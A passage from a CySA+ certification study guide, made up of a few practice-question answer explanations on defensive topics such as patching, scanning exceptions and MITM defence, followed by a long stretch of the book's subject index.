forensic investigation. The other three controls listed are proactive controls designed to 
reduce the risk of an incident occurring and are less likely to directly provide information 
during a forensic investigation. 


A. This is an appropriate case for an exception to the scanning policy. The server appears 
to be secure, and the scanning itself is causing a production issue. Gary should continue 
to monitor the situation and consider alternative forms of scanning, but it would not be 
appropriate to continue the scanning or set an artificial deadline that is highly unlikely to 
be met. Decommissioning the server is an excessive action as there is no indication that it 
is insecure, and the issue may, in fact, be a problem with the scanner itself. 


A. The best defense against a man-in-the-middle attack is to use HTTPS with a digital 
certificate. Users should be trained to pay attention to certificate errors to avoid accepting 
a false certificate. Input validation and patching would not be an effective defense against 
man-in-the-middle attacks because man-in-the-middle attacks are network-based attacks. 
A firewall would be able to block access to the web application but cannot stop a man-in- 
the-middle attack. 


B. While nmap provides service version identification, it relies heavily on the information 
that the services provide. In some cases, fully patched services may provide banner infor- 
mation that does not show the minor version or may not change banners after a patch, 
leading to incorrect version identification. 


B. Tyler should initiate his organization’s change management process to begin the patch- 
ing process. This is a medium severity vulnerability, so there is no need to apply the patch 
in an emergency fashion that would bypass change management. Similarly, shutting down 
the server would cause a serious disruption and the level of severity does not justify that. 
Finally, there is no need to rerun the scan because there is no indication that it is a false 
positive result. 
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A. Carla is looking for a tool from a category known as interception proxies. They run 
on the tester’s system and intercept requests being sent from the web browser to the 

web server before they are released onto the network. This allows the tester to manually 
manipulate the request to attempt the injection of an attack. Burp, ZAP, and Tamper Data 
are all examples of interception proxies. Nessus is a vulnerability scanner and, while 
useful in penetration testing, does not serve as an interception proxy. 


C. Alex needs to quickly move into containment mode by limiting the impact of the 
compromise. He can then gather the evidence and data needed to support the incident 
response effort, allowing him to work with his organization’s desktop and IT support 
teams to return the organization to normal function. 
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forensic information, 359 
timestamps, 371 
updates, 336 
CIFS files, 113 
ciphers 
OpenSSL and, 206 
support, 332 
CIS (Center for Internet Security), 393 
Cisco, NGFW, 378 
Cisco routers 
audits, 7 
lockdown, documentation, 61 
ClearCase, denial-of-service attacks, 106 
CLOSE_WAIT status message, 383 
Cloudflare, 321, 391 
CNAME (canonical name), 325 
COBIT standard, 202, 380, 384 
assessment tools, 212 
code analysis, 370 
static, 386 
code review, 233 
security review and, 195 
code testing, 331 
collisions, 351 
command history, 44, 181 


command prompt, 372 
command-line, server access allowed, 40 
Common Platform Enumeration data, 311 
CompTIA website, ping command, 223 
Computer Security Incident Handling Guide, 
366 
Confidential, US classification level, 381 
confidentiality, 318 
configuration management agent, 87 
connection status, 209 
containerization, 344 
containment, 158, 184, 365, 372, 375 
context-based authentication, 241, 394, 
395 
continuous monitoring, 127, 350 
control reviews, 15 
controls, 237 
logical, 389 
physical, 201, 236, 389, 392 
responsibility continuity, 211 
cookies, 205, 333, 381 
COPE (corporate-owned, personally 
enabled) strategy, 347 
copyrights, 169, 367 
corporate policy compliance, 348 
CPE (Common Platform Enumeration), 331, 
337, 340, 350, 381 
CPU use, 152 
tools, 54 
crash carts, 370 
credentialed scans, 132, 345, 349 
authenticated scans, 351 
credit card information, 79-80, 87, 103, 
112, 331, 352 
disclosures, 142 
regulatory regime, 66 
credit cards, processing, 354 
cross-site request forgery, 349 
cross-site scripting, 126, 129, 335, 349, 382 
cross-training, 393 
cryptocurrency, 377 
mining software, 248-249 
cryptographic erase, 355 
cryptographics, RADIUS and, 247 


cryptography 
birthday attacks, 132-133 
nonrepudiation, 388 
symmetric, 383 
tools, 241 
cryptosystems, asymmetric, 222-223 
CySA+ exam, 369 
CSI (continual service improvement), 391 
CSIRT (Computer Security Incident 
Response Team), 366 
leaders, 358 
policies, 185 
Cuckoo, 373 
CVE (Common Vulnerabilities and 
Exposures), 331, 337, 340, 350, 381 
CVSS (Common Vulnerability Scoring 
System), 331, 337, 340 
A:N string, 352 
availability risk (A:N), 338 
confidentiality risk (C:N), 338 
I:N string, 352 
integrity risk (I:P), 338 
vectors 
AC:L, 352 
Au:N, 352 
AV:N, 351 
C:P, 352 
cyber incident response 
answers, 353-377 
review, 140-192 
cybersecurity 
availability, 318 
confidentiality, 318 
financial institutions, 379 
integrity, 318 
ISO standards, 379 


D 


data architecture, 386 

data carving, 357 

data classification, 338 
policies, 384, 388 
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data encoding, 379 
data exfiltration, 22, 321 
data ownership policies, 224, 384, 388 
data privacy, 338 
data remanence, 338 
data retention, 338 
databases, 121-122 
access restriction, 83 
server location, 198 
server logs, 340 
SQL injection attack, 200 
vulnerabilities, 79 
DCs (domain controllers), 384 
DDoS attacks, 23, 209 
DDoS mitigation technologies, 316 
debit card information, 331 
decomposition, malware, 326 
decomposition diagram, 311 
decryption, private key, 388 
defense-in-depth approach, 241 
degaussing, 161, 362 
denial-of-service attacks, 106, 122, 329, 
335 
LOIC (Low Orbit Ion Cannon), 53 
DEP (Data Execution Prevention), 360, 389 
deprovisioning, automated, user account 
removal and, 382 
DES (Data Encryption Standard) algorithm, 
337, 381 
detection 
alerts, 12 
methods, malware, 2 
phase, logs, 372 
detective control review, 15 
deterministic sampling, 318 
development environment, 386 
device isolation, 361 
devices, tamper-proof seals, 372 
df command, 147 
dig command, 324, 385 
DNS poisoning, 215 
digital certificates 
public keys, 383 
signing, 383 
digital signatures, 210 
asymmetric cryptosystems, 222-223 
private keys, 388 
directory permissions, 140 
directory services, 218-219 
disabled accounts, 328 
disallowed mode, 321 
discovery and attack phase, 20 
discovery and reporting phase, 20 
discretionary access control system, 32 
DiskView, 374 
disposition, SDLC phase, 378 
DMEA (Defense Microelectronics Activity), 
326 
DMZ 
establishing, 6 
vulnerability scans, 102 
DNS 
blackholing, 323 
brute-force attack, 308 
harvesting techniques, 35 
passive assessment, 36 
poisoning, 330 
dig command, 215 
response validation, 44 
reverse lookup, 2, 308 
servers, digital signatures, 323 
WHOIS, 318 
wrong IP address response, 60 
DNS network, fast flux, 6 
DNSSEC, 323 
documentation, 48, 362 
chain of custody, 168, 183 
Cisco lockdown, 61 
documents, scanning setting conflicts, 
125 
DoD Trusted Foundry program, 310 
domains 
harvesting, 317 
registration, 312 
registration information, 329 
secure registration, 310 
DoS attacks, 329 
internal user to third party, 219 


drives 
leased, 357 
purges, 143 
DROP command, 312 
DRPs (disaster recovery plans), 346 
dual authentication, 394 
dual control, 205, 209, 221, 382-385, 393 
DV certificates, 316 
dynamic analysis, 176 


E


ECC (Elliptic Curve Cryptosystem) 
algorithm, 381 
economic impact, calculating, 372 
e-discovery, 376 
deleted information, 190 
EDRM flow, 190 
time spent, 190 
editing tools, built-in, 316 
EDRM flow, 190 
EIGRP (Enhanced Interior Gateway Routing 
Protocol), 343 
email, 41 
address gathering, 36 
blacklisted, 161 
brute force, 27 
data dump, 56 
domain harvesting, 27 
domain probe, 27 
email list builder, 27 
registration services, 312 
spam, 14, 312, 363 
headers, 168, 366 
embezzling investigation, 199 
emergency change procedure, 345 
EMET (Enhanced Mitigation Experience 
Toolkit), 224 
EnCase, 388, 389 
encryption, 18, 334 
BitLocker decryption key, 173 
drive images, 355 


full-disk, 312, 380 
keys, 211, 312 
macOS FileVault 2, 142 
public keys, 388 
endpoint forensics, 368 
endpoint security suite, 245 
enterprise architecture, business strategy 
and, 385 
EOL (end-of-life), 345 
ephemeral key, 383 
equipment, incident response, 178 
eradication phase, 355, 372 
Eraser tool, 149, 357, 369 
ERP (enterprise resource planning) software, 
14, 212 
error messages, 231 
ESP packets, 313 
ESP protocol, 16 
ESTABLISHED status message, 383 
Ettercap, 325 
EV (Extended Validation) certificate, 316 
event classification, 141 
evidence 
authentication, 205 
chain of custody, 359, 363 
gathering, 226 
labeling, 152 
log creation, 171 
physical location, 159 
preservation, 174 
evil twins, 364 
detecting, 164 
wireless attacks, 372 
exfiltration prevention, 202 
exiftool, 140, 178, 314 
expired certificates, 324 
exploitation, 308 
Metasploit, 326 
external audit, 378 
externally accessible information review, 52 


F 


Fagan inspection, 391 
fail2ban, 325 


false positive reports, 339 
fast flux DNS network, 6 
FAT16, 363 
FAT32, 363 
fault injection, 395 
FERPA (Family Educational Rights and 
Privacy Act), 331, 379, 384 
fgdump, 46, 324 
File System audit, 370 
files 
change monitoring, 16 
disk space versus file size, 170 
recovering, slack space, 149 
validation, 140 
FileVault, 354 
filtered system, 60 
filters, INPUT, 309 
fingerprinting, 310, 340 
passive, 327 
preventing, 53 
FireEye, 391 
firewalls, 60, 318 
CheckPoint, 378 
DNS responses, malicious domains, 
58 
dual, 198, 378 
evasion, 324 
inbound traffic denied, 21 
iptables-based, 3, 14 
logs, 395 
LOIC (Low Orbit Ion Cannon), 53 
NGFW, 378 
rulebase, 208 
selecting, 198 
social engineering and, 381 
stateful packet inspection, 51, 326 
topology gathering reconnaissance 
prevention, 29 
vendors, 232 
web applications, 232, 249 
first-responder kits, 370 
FISMA (Federal Information Security 
Management Act), 350 
compliance, 130 
incident reporting, 180, 371 
flow logs, 360 
Follow option, 379 
footprints, 16 
forensic kit, 376 
included items, 191 
preparation, 191 
forensics 
BitLocker-encrypted drive copy, 187 
cable labeling, 148 
chain of custody form, 162 
Chrome, 179 
logs access, 154 
civil cases, 363 
data capture, order of volatility, 166 
data extraction levels, 188 
device isolation, 361 
e-discovery, 363 
EnCase, 388, 389 
endpoint, 368 
Eraser tool, 149 
evidence 
gathering, 226 
preservation, 174 
producing, 162 
forms, 145 
FTK, 388, 389 
Helix, 388, 389 
images 
duplicate, 167 
failure, 183 
hard drive format, 149 
live, 176 
network share, 166 
third-parties, 165 
incognito downloads, 158 
iPhone, 188 
backup, 168 
law enforcement seizure, 165 
Linux backdoor account, 174 
live imaging, 369 
live information, 363 
MD5 and, 366 
memory forensics, 164 
mobile devices, 158, 220 
open source suite, 221 
original downloaded files, 173 
outside parties, 365 
password recovery, 147 
PC removal, 162 
photos, 178 
postmortem, 369 
power cable pull, 188 
retention policies, 365 
SANS SIFT tool, 167 
sending images, 144 
SHA-1 and, 366 
SHA-2 and, 366 
software-based shutdown, 188 
unexpected output, 192 
USB drives, 166 
virtual machines, 154 
capture, 148 
Windows 10 system usage, 188 
Windows Quick Format, 157 
witnesses, 367 
Word files unreadable, 180 
formal code reviews, 233, 377 
format string attacks, 359 
FortiWeb, 391 
Framework Core, 391 
Framework Implementation Tiers, 391 
Framework Profiles, 391 
FTK (Forensic Toolkit), 388, 389, 391 

FTK Imager Lite, 359, 370 
FTP (file transfer protocol) 
securing, 20 
security, 346 
full-disk encryption, 312, 380 
fuzz testing, 203, 250, 380, 386, 395, 398 
fuzzers, 387 


G 


games, preventing, 40 

GET, 321 

GLBA (Gramm-Leach-Bliley Act), 379, 384 
Google dorks, 24, 313, 317 


Google queries, 15 

governance, 385 

government classification levels, 381 

GPOs (Group Policy objects), 384 

GPS systems, location data, 362 

GraphDisk, 374 

green team, 5 

guest operating systems, 345 
attacks, 64 


H


hard drives, sanitizing, 149 
hardening. See system hardening 
hardware 

naming, 18 

write blocker, 355 
harvesting, anti-harvesting techniques, 48 
Hashcat, 358 
hashes, 313 

collisions, 350 
hashing, 18, 30, 317 
hashing malware packages, 28 
headers, spam, 366 
Helix, 388, 389 
heuristic analysis, 40, 370 
heuristic-based detection, 2, 308 
HFS+ format, 363 
hibernation files, 368 
High Severity Report, 66, 331, 350 
highest-severity vulnerabilities, 347 
HIPAA (Health Insurance Portability and 
Accountability Act), 180, 196, 213, 331, 
379, 384 

HIPS, 312 
honeynet, 49, 325, 353 

threats, 5 
honeypots, 49, 353 
host information, 46 
host-based solutions, 312 
hosts, file analysis, automated, 48 
htop command, 54, 327 
HTTP, IPS rules for filtering, 334 
HTTP proxy, nmap, 311 
HTTPS, TLS encryption, 315 
hypervisor, 345 


I


IaaS (infrastructure as a service), 13, 382, 398 
ICMP Echo Reply packet, 377 
ICS (industrial control system), 332 
ICs (integrated circuits), 310 
ID badges, 386 
IDaaS (identity as a service), 398 
identification phase, 376 
identities, AAA framework, 397 
identity management infrastructure, 202, 
216, 223-224, 231, 239 
OAuth framework, 236 
IDP (identity provider), 378 
IDS logs, 340, 382 
ifconfig, 39, 162, 233, 388 
IIS (Internet Information Server), 
vulnerabilities, 334 
images 
duplicates, 167 
exiftool, 178, 179 
fiber links, 374 
forensics 
failure, 183 
hard drive format, 149 
network share, 166 
FTK Imager Lite, 370 
live, 176 
metadata, 186 
reverse image search tools, 374 
specific files, 152 
third-parties, 165 
write issues, 154 
impersonation attacks, 356 
Imperva, 398 
improper usage, 356 
incident data retention, 165, 170 
incident phase, 355 
analysis practices, 163 


428 incident response — John the Ripper 


incident response 
analysis, 189 
attacker identification, 167 
communications, 155, 360 
containment phase, 188, 365, 375 
economic impact, 182 
equipment, 178 
follow-up activity, 166 
improvements, 146 
lessons-learned review, 159, 356 
management and, 163, 364 
network cable disconnect, 166 
outside parties, communication, 166 
phases, 164 
playbooks, 373 
post incident communication, 191, 376 
proprietary information changes, 174 
recovery process, 169 
recovery time, 158 
resuming network access, 157 
states, 183 
third-party providers, 362 
tools, 191 
zero-day threats, 159 
incidents 
classification, 159 
potential, 159 
incognito, download detection, 158 
indicators of incidents, 361 
Info level vulnerability, 341 
information gathering, 16, 57 
information impact analysis, 375 
information security policy, 185, 206 
reviews, 201 
infrastructure-as-a-service, 322 
INPUT, filters, 309 
input validation, 344, 379 
integrity 
cybersecurity and, 318 
loss, 369 
intellectual property, 176, 367 
interception proxy, 219 
internal audit, 378 
Internet Explorer, 342 


intrusion detection, 379 
open source, 212 
intrusion detection and prevention systems, 383 
intrusion detection and protection, 384 
intrusion prevention, 209, 380 
IP addresses 
changing, 43 
external sources, 113 
locating for scan, 28-29 
off-site connection and transfer, 157 
IP reputation, 360 
iperf, 359 
iPhone, backups, 366 
IPS (intrusion prevention systems), 397 
alerts 
firewall rules and, 382 
port scans and, 382 
vulnerability scans and, 382 
IPSEC, ESP packets, 313 
IPsec, VPN links, 335 
iptables, 14, 47, 324, 388 
iptables-based firewalls, 3 
DROP command, 312 
IPv6 address records, 320 
IR life cycle, 364 
IRC, TCP ports, 321 
ISACs (Information Sharing and Analysis 
Centers), 366 
ISO 27001, 379 
organizations requiring, 235 
ISO standards, 201 
IT manager, roles, 149 
ITIL framework, 200, 379 
CSI (continual service improvement), 391 
IV certificates, 316 


J 


john process, 191 

John the Ripper, 147, 242, 353, 358, 376, 396 
incremental mode, 356 
Linux passwords, 140 
single crack mode, 356 


JRE, 340 

jump box, 309, 324, 332 
jump host, 309 

jump kits, 370 

jump server, 324 
Juniper, 391 


K 


kaizen continuous improvement approach, 
240, 394 

Kali Linux, 324 

Kerberos, 323, 385, 394 

kernel-mode drivers, 336 

kill command, 327 


L 


labeling evidence, 152 
LACNIC, 319 
LANMAN hashes, 314 
laptops, 64, 69 
LAST_ACK status message, 383 
latency, 11, 311, 319 
law enforcement seizure of hardware, 165 
LDAP (Lightweight Directory Access 
Protocol), 320, 380 
harvest prevention, 57 
injection attacks, 387 
node types, 222 
Lean Six Sigma, 397 
leased drives, 357 
least privilege, 205, 382-383, 393 
legal agreements, 120 
lessons-learned review, 159, 356, 361 
level-based access control, 32, 319 
link failure, 22, 360 
Linux 
active network connections, 221 
authentication logs, 243 
auth.log file, 49 
backdoor account, 174 
backup and restore commands, 354 
buffer overflow attacks, 150 
df command, 147 
echo command, 38 
executable modification, static libraries, 151 
file command, 358 
file information, 17 
getfacl command, 354 
$HOME/.ssh folder, 186 
ifconfig command, 360 
ip link show command, 360 
Kali, 324 
kill command, 327 
netstat -i command, 360 
network interface list, 156 
open files, 56 
passwords, John the Ripper, 140 
permissions, 147 

backups, 142 
rogue services, 44 
root account, 177 
runas command equivalent, 95 
sending events, 182 
setfacl command, 354 
user accounts 
age, 176, 369 
information, 322 
setup, 167 


listening ports, 319 

LISTENING status message, 383 
load balancers, aliasing and, 322 
load testing, 383, 384 

location data, 362 

logging, 379 


standardizing, 246 


logical controls, 389 
login 


blocking, 309 
failure, enabling, 369 
interactive, 341 

user ID and, 5 


logs, 340 


Apache server, 24 
searching, 234 
web server, 24 
LOIC (Low Orbit Ion Cannon), 53, 327 
ls command, output, 20 
lsof command, 146, 328, 356 


M


MAC addresses 
allowed devices, 360 
changing, 321 
vendor prefixes, 312 
Macintosh, monitoring, 173 
macOS 
configuration settings, 165 
drive format, 357 
FileVault 2 encryption, 142 
high memory use, 181 
memory pressure, 371 
mail servers 
clusters, 311 
vulnerability report, 83 
malfeasance detection, 213 
Maltego, 326 
malware 
air gaps, 160 
analysis, 11, 13, 183 
base64 encoding, 329 
beaconing behavior, 143 
BIOS-resident packages, 367 
checking for, 185 
decomposition, 326 
detection methods, 2 
distribution, connection prevention, 45 
eradication, 169 
fast flux DNS network, 6 
hashing malware packages, 28 
heuristic-based detection methods, 308 
hosts file changes, 18, 313 
malwr.com, 54 
MBR-resident packages, 367 
naming, 368 
obfuscated code, 58 
package components, 51 
package detection, 34 


UEFI-resident packages, 367 

user input, 172 
malwr.com, 55 
mandatory access control, 32, 319 
mandatory vacations, 205 
man-in-the-middle attacks, 247, 356 
mapping, passive, network topology, 36 
MBSA (Microsoft Baseline Security 
Analyzer), 308, 371, 387, 397 
passwords, 57-68 
MD2 algorithm, 350 
MD4 algorithm, 350 
MD5 algorithm, 350 

checksum validation, 155 
MDM (mobile device management), 347 
media sanitization, 362 

degaussing, 161 

descriptions, 160 

hard drives, 149 

techniques, 157 

validation, 160 

volatility, 371 
memory 

DEP, 372 

forensics, 164 

imaging, 357 

pressure, 371 

Process Explorer, 195 

usage monitoring, 359 
MemShuffle, 360 


message rejection errors, domain harvesting 
and, 317 
messages 
CLOSE_WAIT, 383 
ESTABLISHED, 383 
LAST_ACK, 383 
LISTENING, 383 
messaging, secure, 148 
metadata, 186 
photos, 21, 140, 353 
MetaScan, 374 
Metasploit, 308, 326, 343 
microSD cards, digital camera filesystem 
type, 161 
Microsoft SQL, ports, 308 

Minibis, 373 

mobile devices, 120 
forensics, 158, 220 
isolation, 158 

ModSecurity, 387, 398 


MOUs (memorandums of understanding), 
346, 347 
MRTG (Multi Router Traffic Grapher), 397 
MSSPs (managed security service providers), 
382 
multifactor authentication, 197, 214, 217, 
238, 320, 381 
mutation testing, 395 
MX records, 325 
MxToolbox MX Lookup tool, 10 
MySQL, 24, 316 
ports, 308 


N


NAC solutions, 55, 328 
Nagios, 397 
logs, error message, 148 
National Cyber Security Authority, 371 
National Cyber Security Centre, 371 
National Software Reference Library, 
319 
system binary kits, 367 
NAXSI, 391, 398 
nbtstat -c, 9, 310 
nbtstat -s, 314 
Nessus, 308, 326, 343, 348 
net config command, 21 
net group command, 21 
net use command, 21, 315 
net user command, 21, 315 
NetBIOS 
name conflict vulnerability, 90 
session detection, 19 
session status, 314 
netcat, 15, 310, 313, 320 
netcat, as listener, 317 


NetFlow, 241, 395 
netflow collectors, 30 
netflow logs, 340, 355 
netstat, 7, 209, 214, 310, 385 
flags, 187 
listening ports, 319 
output, 46 
netstat -at, 175 
network flows, 315 
central file server, 40 
logs, 59 
Network General, 398 
Network Miner, 14 
network segmentation, 344, 
377 
network shares, listing, 315 
network topology maps, 15 
NetworkMiner, 325 
Nikto scan, 328, 397 
NIST (National Institute of Standards and 
Technology) 
adverse events, 362 
backups, 364 
Computer Security Incident Handling 
Guide, 366 
Cybersecurity Framework, 387 
templates, 233 
tiers, 219 
deprecated authentication factors, 
236 
Guide to Cyber Threat Information 
Sharing, 153 
integrity loss, 369 
IR life cycle, 364 
media sanitization, 362 
outside party designation, 365 
recoverability effort categories, 
361 
SP800-61, incident categories, 361 
SP800-115 process flow, penetration 
testing, 4, 310 
Special Publication 800-63-3, 392 
threat categories, 58 
validations, 372 
nmap, 7, 8, 308, 310, 313, 375 
-O flag output, 9 
anti-firewall capabilities, 329 
Common Platform Enumeration data, 
311, 314 
cpe:/o entry, 45 
fingerprinting, 310 
firewall evasion, 324 
hardware naming, 18 
hops, 317 
HTTP proxy, 311 
network path distance, 25 
port scanned, 204 
printer identification, 42 
scan type, 7 
scans, 42, 50 
firewalled subnet, 46 
ping-through, 10 
proxy, 10 
randomized host, 10 
reflection, 10 
shell account, 56 
software naming, 18 
-sU flag, 323 
nmap -sP, 326 
nmap -T, 39, 321 
nondisclosure agreements, 201 
nonrepudiation, 388 
notifications, 311 
nslookup command, 248 
NTLM (NT LAN Manager), 380 
NTP (Network Time Protocol), 335 
NX bit, mapped memory regions and, 358 


O 


OAuth, 236, 378, 385, 392, 394 
redirect attack, 197 
OEM documentation, 330 
OpenID, 394 
OpenSSL, 338, 395 
ciphers, 206 
OpenVAS, 375, 397 


operational control review, 15 
operations guides, 373 
Ophcrack, 358 
Oracle 
ports, 308 
TCP ports, 321 
Oracle Database TNS Listener Poison Attack 
vulnerability, 347 
organizations, 167 
Orizon, 236 
OS rules, clients, 55 
OSINT (open source intelligence), 21, 315 
social media profiles, 25 
OSSEC SIEM logs, 163 
OSSIM, 386 
OUs (organizational units), 384 
outside parties, 365 
OV certifications, 316 
OVAL (Open Vulnerability and Assessment 
Language), 331, 340 
over-the-shoulder reviews, 391 
overwriting, 355, 368 
OWASP (Open Web Application Security 
Project), 381, 386 
Orizon, 236 
security controls list, 246 
SQL injection attacks, 200 


P 


PaaS (platform as a service), 382, 398 
packets, 213 
capture, 60 
outbound, 368 
sniffing, 355 
page file, 364 
pair programming, 377, 391 
Palo Alto, 391 
NGFW, 378 
PAM (pluggable authentication module), 
325, 367 
pass-around reviews, 377, 391 
passcodes to SMS, 395 
passive fingerprinting, 327 
passive footprinting, 9 
passive network mapping, 320 
passive network monitoring, 348 
passphrases, 374 
pass-the-hash attack, 18 
passwd binary, 314 
password-based authentication, 238 
passwords, 202, 315, 393 
captured, 36 
data dump, 56 
disabled accounts, 328 
expiration policy, 378 
exposed, 3 
forensics, 147 
hashing, 18, 308 
John the Ripper, 353, 376, 396 
Linux, 140 
knowledge-based factors, 378 
MBSA and, 57 
PCI DSS compliance, 204, 239 
policies, 197, 204, 211 
recovery, 147, 168 
Windows 7 station, 180 
SAM, 375 
SASL, 387 
self-service reset, 242 
SSHA storage, 395 
stolen, 36 
storage schemes, 241 
weak policies, 346 
website pop-up messages, 207 
Windows 7 system, 151 
patch levels 
assessing, 2 
MBSA, 308 
Patch Report, 331, 350 
patches, 120, 337 
best practices, 203 
change management and, 114 
restarts, 316 
scheduling, 97 
test environment and, 240, 380 
virtualized systems, 71 
Windows 10 systems, 179 
zero-day threats, 361 
patents, 169, 367 
pcap file, traffic, 33 
PCI DSS (Payment Card Industry Data Security 
Standard), 50, 112, 331, 332, 352, 381 
compliance, 344 
password compliance, 204, 239 
Peach Fuzzer, 250, 387 
penetration testing, 2, 4 
attackers, 5 
discovery and attack phase, 20 
discovery and reporting phase, 20 
netcat, 15 
NIST SP800-115 process, 310 
planning and attack phase, 20 
planning and discovery phase, 20 
rules of engagement, 37, 325 
shunning and, 315 
social media, 7 
Performance Monitor, 359 
permission for scans, 340 
permissions 
change monitoring, 177 
Linux, 147 
backups, 142 
Sysinternals, 140, 217 
PGP key servers, 2 
PHI (protected health information), 180, 
196, 384 
data elements, 371 
phishing attacks, 35, 221, 376, 380 
password-based authentication system, 238 
SAML phishing, 30 
spear phishing, 30, 318 
tuna phishing, 30 
user training, 388 
whaling, 30, 318 
photographs 
exiftool, 140, 178 
location data, 362 
metadata, 21, 140, 186, 353 
social media, 371 
phpinfo file, 349 
physical controls, 201, 236, 389, 392 
physical hardware, 345 
physical security controls, 199 


PII (personally identifiable information), 363 


ping, 7 
ping sweep, 329 
PINs, 386, 393 
pivots, 321 
plain-text authentication, 96, 340 
planning and attack phase, 20 
planning and discovery phase, 20 
playbooks, 373 
PNG (Portable Network Graphics), 337 
policies, 185 
account management, 384 
CSIRT (Computer Security Incident 
Response Team), 185 
data classification, 384 
data ownership, 224 
passwords, 197 
retention policies, 165 
policy violations, 141 
POODLE vulnerability, 336 
POP3 (Post Office Protocol v3), 339 
port scans, 32, 355 
detecting, 18 
detection, 314 
likelihood, 12 
nmap and, 204 
service provider infrastructure, 41 
services, 66-67 
vulnerabilities, 67 
ports 
3306, 2 
3389, 41 
8080, 41 
8443, 41 
externally initiated connections, 22 
HTTPS, 337 
listening, 319 
Microsoft SQL, 308, 337 
MySQL, 308 
open, 3 
Oracle, 308, 337 


Postgres, 308 
security filters, MAC addresses, 321 
web servers, 331 
POST, 321 
Postgres, 323 
ports, 308 
post-rebuild validation, 143 
PPTP (Point-to-Point Tunneling Protocol), 
VPN connections, 335 
Practice Exam 1, 252-275 
answers, 399-408 
Practice Exam 2, 278-305 
answers, 408-418 
precursors of incidents, 361 
preservation phase, 190 
preserving evidence, 174 
pretexting, 21, 30 
social engineering and, 315, 318 
printers 
nmap and, 42 
web servers and, 342 
priorities, 77 
private key 
decryption, 388 
digital signatures, 388 
privilege creep, 203, 380 
privilege escalation, 39, 126, 309, 311, 334 
privilege escalation attack, 370, 389 
privileges, 236 
Process Explorer (Sysinternals), 195 
Process Monitor, 364 
procurement, chain of custody, 7 
profiling, 21 
Proventia, 384 
proxychains, 328 
ps command, 340 
output, 19 
public key cryptography, 383, 388 
public records, 331 
purging, 355 
degaussing, 362 
drives, 143 
Windows systems, 176 
PuTTY, 343 


Q 


QRadar, 386 
Qualys vulnerability scanner, 397 
Qualys Patch Report, 66 
QualysGuard scanner, 109 
query parameterization, 379 
query strings, buffer overflow attack, 380 
Quick Format (Windows), 360 
quid pro quo, 30 


R


RAD (rapid application development) 
approach, 387 
RADIUS, 323, 385, 391, 394 
authentication protocol, 230-231 
cryptographics, 247 
rainbow tables, 328 
Ophcrack and, 358 
random sampling, 318 
ransomware, 50, 91 
backups and, 326, 339 
functional impact category, 182 
phishing message, 221 
rapid application development, 390 
Rational ClearCase Portscan Denial of 
Service vulnerability, 347 
RAW format, 363, 365 
RDP, service port, 322 
rebuilds, validation, 143 
reconnaissance efforts 
blue team, 38 
footprint, 8 
red team, 38 
rules of engagement, 2 
tools, 50 
recovery phase, 372 
Red Hat 
ownership changes, 158 
permission monitoring, 158 
updates, MySQL database, 346 
red team, 5, 11, 38, 309, 320, 323, 330 
reformatting, 355 
regression testing, 394, 397 
regulated information breach, 320 
remote access approval, 197 
remote code execution attack, 348 
remote login, prevention, 4 
reports, 112 
High Severity Report, 331, 350 
Patch Report, 331, 350 
reviewing, 349 
system administrator, 54 
Technical Report, 331, 346, 
350 
Unknown Device Report, 331, 350 
vulnerability scanners, 66 
requests for exceptions, 212, 220, 384 
resource exhaustion attacks, 23 
Resource Manager, 359 
resource services, 392 
responsive control review, 15 
retention policies, 165, 229, 365, 367, 
390 
reviews, 391. See also control reviews 
RIPE, 319 
risk appetite/tolerance, 351 
rogue access points, 141 
rogue devices 
identifying, 146 
SolarWinds setup, 155 
role-based access control, 32, 
319 
root account, 26-27 
remote login prevention, 4 
rootkits, 398 
route poisoning, 323 
RP (relying party), 378 
RSA (Rivest-Shamir-Adleman) algorithm, 
381, 383 
rules of engagement, 45, 48, 325 
penetration testing, 323 
reconnaissance efforts, 2 
rulesets, 318 
runas command, 340 
S 


SaaS (software as a service), 382 
port scans, 312 


SABSA (Sherwood Applied Business Security 
Architecture), 382, 386 
logical security architecture, 206 
physical security architecture layer, 217 
SAM, passwords, 375 
SAML authentication flow, 231 
user identity, 197 
SAML phishing, 30 
SAML-based authentication flow, 378, 391 
sandbox, 328 
change deployment, 353 
malware analysis, 373 
patch deployment, 347 
sanitizing media, 362 
degaussing, 161 
descriptions, 160 
hard drives, 149 
next step, 182 
techniques, 157 
validation, 160 
SANS SIFT tool, 167 
SASL, 387 
sc (service controller), 327, 329 
SCADA (supervisory control and data 
acquisition) system, 230, 327, 332 
scan types 
ASV (approved scanning vendor), 342 
local, 355 
nmap, 7 
scanner placement, 29 
scans 
authenticated, 351 
credentialed, 345, 349, 351 
frequency, 349 
IT staff, 351 
scheduled, 350 
sensitivity, 344 
SCAP (Security Content Automation 
Protocol), 65, 96, 129 
CCE (Common Configuration 
Enumeration), 88, 337, 350, 381 


CPE (Common Platform Enumeration), 
88, 331, 337, 340, 350, 381 
CVE (Common Vulnerabilities and 
Exposures), 88, 331, 337, 340, 350, 
381 
CVSS (Common Vulnerability Scoring 
System), 88, 331, 337-338, 340, 
351-352 
description language, 66 
scope worksheet, 59 
scoping, 309 
SDelete, 385 
SDLC best practices, 250 
SDLC phases, 199, 212 
disposition, 378 
searches, Google dorks, 313 
SECaaS (security as a service), 382, 
398 
secpol.msc, 174 
Secret, US classification levels, 381 
secure administrative host, 324 
secure messaging, 148 
secure zone, establishing, 6 
security, obscurity and, 397 
security architecture review, 
193-250 
answers, 377-399 
security artifacts, 384 
security incidents, 141, 354 
security policies 
exception requests, 212, 220, 384 
reviews, 382 
security priorities, 77 
security reviews, code reviews and, 
195 
segmentation, 140, 228 
self-signed certificates, 21, 315 
sensor network, vulnerabilities, 71 
separation of duties, 205, 213, 221, 
381-384, 387, 393 
privilege creep, 380 
server-based scanning, 348 
servers 
as data repository point, 177 
as egress point, 177 


service design, 379 
service ports 
8080, 322 
8443, 322 
service validation, telnet and, 316 
services 
command-line control, 327 
shutting down, 59 
session hijacking, 380 
session key, 383 
setupapi file, 373 
SHA-1 algorithm, 350 
SHA-256 algorithm, 350 
shadow copies, 23, 161 
disabling, 363 
SharePoint, 332 
vulnerabilities and, 70-71 
shasum utility, 237, 246 
shell account, nmap scans, 56 
Shodan scan data, 53 


Shodan searches, 2, 8, 16, 312, 313 


shunning, 22, 315 


SIEM (security information and event 
management), 12, 27, 196, 311, 315, 
382, 392 
forensic analysis and, 317 
new user, 163 
open source, 216 
OSSIM, 386 
port scan detection, 18 
Signal protocol, 357 
signature-based detection, 2 
hashing and, 317 
sinkholing, 328 
site-to-site VPNs, 239 
Six Sigma, 397 
slack space, 364, 374 
Windows partitions, 164 


SLAs (service level agreements), 346, 347 


slow downs, 177 

SMS 
authentication, 392 
